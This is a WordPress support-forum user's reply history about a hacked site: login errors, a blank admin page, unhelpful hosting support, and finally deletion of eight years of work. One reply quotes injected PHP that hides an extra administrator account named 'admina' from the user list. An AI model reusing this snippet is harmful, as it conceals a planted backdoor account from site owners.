mikuberries
Forum Replies Created
-
Closing this thread as I am too inexperienced to find a solution and my host has been a big pile of useless fail.
I canceled and deleted my entire domain and 8 years of work.
So you were right, @davood Dehnavi.
I have done all of those, taken every step, installed every type of system to help combat this, but I’m starting to think my database was compromised and I honestly do not have the time, experience, expertise or patience to do so much of the advanced steps it had you do. I have asked my host for my help for TWO WEEKS, and they still have not helped me. They keep referring me to the same resources you linked and have left everything up to me. I am too inexperienced to continue trying to fix this and I’m at the wit’s end.
My host has not helped me at all, and that is the most frustrating part.
I have been trying to prevent redoing my website from scratch, as it is almost 8 years of accumulated data on there. :\
@kmessinger
Thank you. I will try that forum.Forum: Fixing WordPress
In reply to: User Query ErrorI fixed it. There was something wrong with the wp-config.php file. Just uploaded a fresh version and deleted the old one. Problem solved.
Forum: Fixing WordPress
In reply to: User Query ErrorWell…
Bad news.
I tried everything on both the links you provided and I am still unable to log in.
I get this error on http://www.lovestarr.net/wp-login.php
ERROR: Cookies are blocked due to unexpected output. For help, please see this documentation or try the support forums.
I already cleared my cookies and made sure it was setup correctly and it did not change the error… I use Chrome.
On my http://www.lovestarr.net/wp-admin/ page, all I get is a blank page and this:
add_action(‘pre_user_query’,’yoursite_pre_user_query’); function yoursite_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username != ‘admina’) { global $wpdb; $user_search->query_where = str_replace(‘WHERE 1=1’, “WHERE 1=1 AND {$wpdb->users}.user_login != ‘admina'”,$user_search->query_where); } }
If I disable the themes, it gets rid of the error, BUT it continues to show a blank screen.
I uploaded a fresh wp-login.php file and nothing. The more advanced attempts to fix this are beyond my level of experience and expertise. I don’t want to mess something up beyond what it is…
I don’t know what to do anymore.
Forum: Fixing WordPress
In reply to: User Query ErrorI’m sorry, I am not understanding the question…
I cannot log into my WordPress admin at all, from either computer. The results I am receiving are from using the Securi Site Check.
Forum: Fixing WordPress
In reply to: User Query ErrorI just did what my website host instructed me to do and I don’t know what else to do. I checked that link you sent me and thats basically what I did yesterday, but I was still getting errors.
If I run Securi SiteCheck on my personal computer, it says it doesn’t have malware. If it run it on my work computer, it says it does have malware and its not updated.
I don’t know what else to do when I can’t even log into my website. I was able to install WordFence AND Securi on it yesterday, but now it won’t let me log in. I have already done everything I am able to do on my own.